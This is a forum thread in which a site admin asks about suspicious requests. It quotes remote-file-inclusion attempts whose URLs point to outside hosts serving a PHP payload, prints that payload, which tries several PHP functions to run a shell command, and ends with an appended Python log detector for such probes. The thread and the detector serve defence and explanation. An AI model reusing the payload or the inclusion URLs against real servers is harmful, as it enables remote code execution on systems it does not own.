Simple Machines Community Forum

Topic started by: Max™ - December 22, 2007, 05:14:17 PM

Title: Unknown Actions
Posted by: Max™ - December 22, 2007, 05:14:17 PM
Can anyone explain what this user is trying to do? I think it's some kind of hack?
They keep changing IPs, but from the strange actions and "libwww-perl/5.65" after the IP I know it's the same person.

Guest(158.251.4.110, libwww-perl/5.65)
Time 09:48:06 pm  Unknown Action

Unknown actions are something like this....

[Unknown Action]
http://myforum.com/ndex.php?action=pm//embed/day.php?path=http://filicudi.t35.com/cs.txt??;embed;day_php?path=http:;filicudi_t35_com;cs_txt??

Going onto the link (http://filicudi.t35.com/cs.txt) brings up some kind of remote code?

<?php
echo "549821347819481<br>";
$cmd="id";
$eseguicmd=ex($cmd);
echo $eseguicmd."<br>";
function ex($cfe){
    $res '';
    if (!empty($cfe)){
        if(function_exists('exec')){
            @exec($cfe,$res);
            $res join("\n",$res);
        }
        elseif(function_exists('shell_exec')){
            $res = @shell_exec($cfe);
        }
        elseif(function_exists('system')){
            @ob_start();
            @system($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(function_exists('passthru')){
            @ob_start();
            @passthru($cfe);
            $res = @ob_get_contents();
            @ob_end_clean();
        }
        elseif(@is_resource($f = @popen($cfe,"r"))){
            $res "";
            while(!@feof($f)) { $res .= @fread($f,1024); }
            @pclose($f);
        }
    }
    return $res;
}
exit;


Another one yesterday was...

(64.118.86.20, libwww-perl/5.808)
Unknown Action - http://myforum.com/index.php?action=register/Calendar.php?sourcedir=http://www.unad.edu.co/induccion/site/modules/pr.txt??;egister;Calendar_php?sourcedir=http:;www_unad_edu_co;induccion;site;modules;pr_txt??

http://www.unad.edu.co/induccion/site/modules/pr.txt That link is dead now, but it's the same code as above.  :-[
Title: Re: Unknown Actions
Posted by: Tony Reid - December 22, 2007, 05:17:30 PM
Yes - they are trying to hack you.

Let your host know.
Title: Re: Unknown Actions
Posted by: Max™ - December 22, 2007, 05:26:28 PM
Yeah, kinda figured... but what are they trying to do exactly? Kinda curious.  :P
Title: Re: Unknown Actions
Posted by: Tony Reid - December 22, 2007, 05:28:15 PM
Get command line access to your server.
Title: Re: Unknown Actions
Posted by: Daniel15 - December 22, 2007, 09:41:25 PM
They're trying to hack you. Be assured, this will not work with SMF. Most likely, it's an automated (scripted) attack against a huge number of sites.

Quote: libwww-perl/5.65
This means they're using a Perl script to do this.

Quote: brings up some kind of remote code?
That tries using various methods to run the "id" command, which returns the user and groups the Apache user runs under. I'm guessing just as a proof-of-concept, and to see if they can run other commands.
Title: Re: Unknown Actions
Posted by: H - December 23, 2007, 11:32:54 AM
You may also want to block their IP just to save yourself a small bit of bandwidth ;)
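
Added example, not part of the original thread: a small detector for the kind of request discussed above, where a query parameter (`path=`, `sourcedir=`) carries a remote URL, run over web server access logs. The combined log format, the `remote.example` host and the sample lines are assumptions constructed for illustration; grouping by payload URL reflects the first post's observation that the same requests arrive from changing IPs.

```python
import re
from urllib.parse import unquote

# Apache/Nginx "combined" access-log format (assumed; SMF's own log is not parsed here).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
# A parameter whose value is itself a remote URL, e.g. ?path=http://host/file.txt??
REMOTE_PARAM_RE = re.compile(r'[?&;]([\w\[\]]+)=((?:https?|ftp)://[^\s&;]+)', re.I)

def classify(line):
    """Return a finding for a remote-file-inclusion probe, or None otherwise."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = unquote(m["target"])          # also catches http%3A%2F%2F...
    hit = REMOTE_PARAM_RE.search(target)
    if not hit:
        return None
    return {
        "ip": m["ip"],
        "param": hit.group(1),
        "remote_url": hit.group(2).rstrip("?"),   # logged requests end the URL with '??'
        "scripted_ua": "libwww-perl" in m["ua"].lower(),
        "status": int(m["status"]),
    }

def summarize(lines):
    """Group source IPs by payload URL so rotating IPs collapse into one campaign."""
    campaigns = {}
    for finding in filter(None, map(classify, lines)):
        campaigns.setdefault(finding["remote_url"], set()).add(finding["ip"])
    return campaigns

# Constructed sample lines modelled on the requests quoted in the thread.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/Dec/2007:21:48:06 +0000] "GET /index.php?action=pm//embed/day.php?path=http://remote.example/cs.txt?? HTTP/1.1" 200 5120 "-" "libwww-perl/5.65"',
    '198.51.100.7 - - [22/Dec/2007:21:52:40 +0000] "GET /index.php?action=pm//embed/day.php?path=http://remote.example/cs.txt?? HTTP/1.1" 200 5120 "-" "libwww-perl/5.65"',
    '203.0.113.5 - - [21/Dec/2007:10:02:11 +0000] "GET /index.php?action=register/Calendar.php?sourcedir=http%3A%2F%2Fremote.example%2Fpr.txt?? HTTP/1.1" 200 5120 "-" "libwww-perl/5.808"',
    '192.0.2.77 - - [22/Dec/2007:22:01:00 +0000] "GET /index.php?action=profile;u=42 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '192.0.2.78 - - [22/Dec/2007:22:03:15 +0000] "GET /index.php?topic=12.0 HTTP/1.1" 200 9001 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for url, ips in summarize(SAMPLE_LOG).items():
        print(url, sorted(ips))
```

Legitimate parameters that carry URLs (redirect or avatar links, for example) will also match, so treat hits as leads to review rather than automatic blocks.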